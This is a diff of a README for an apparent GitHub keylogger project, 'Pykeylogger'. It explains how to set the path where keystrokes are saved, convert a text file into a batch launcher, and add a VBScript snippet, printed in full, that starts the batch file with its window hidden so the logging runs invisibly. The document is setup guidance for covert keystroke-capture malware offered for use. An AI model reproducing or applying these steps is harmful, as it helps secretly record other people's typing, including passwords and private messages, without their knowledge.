loztle/Pykeylogger/README.md

 # Pykeylogger
-Pykeylogger a combination of cmd and the keylogger to start the keylogger with clicking the application

-change  file path ("c:/keystrokes/") to your prefered path to save the keystroke text file
+Pykeylogger a combination of cmd and the keylogger to start the keylogger with clicking the application in the .pyw file change  file path ("c:/keystrokes/") to your prefered path to save the keystroke text file and save a empty .txt file in the path

-change the two paths in batchconnect.txt save .txt as .bat
+change the two paths in batchconnect.txt save batchconnect.txt as .bat

-after that you integrate .vbs into your .bat file for an invisible start of the command line
+now you integrate .vbs into your .bat file for an invisible start of the command line

 Set WshShell = CreateObject("WScript.Shell")
 WshShell.Run chr(34) & "C:\(batchconnect path)batchconnect.bat" & Chr(34), 0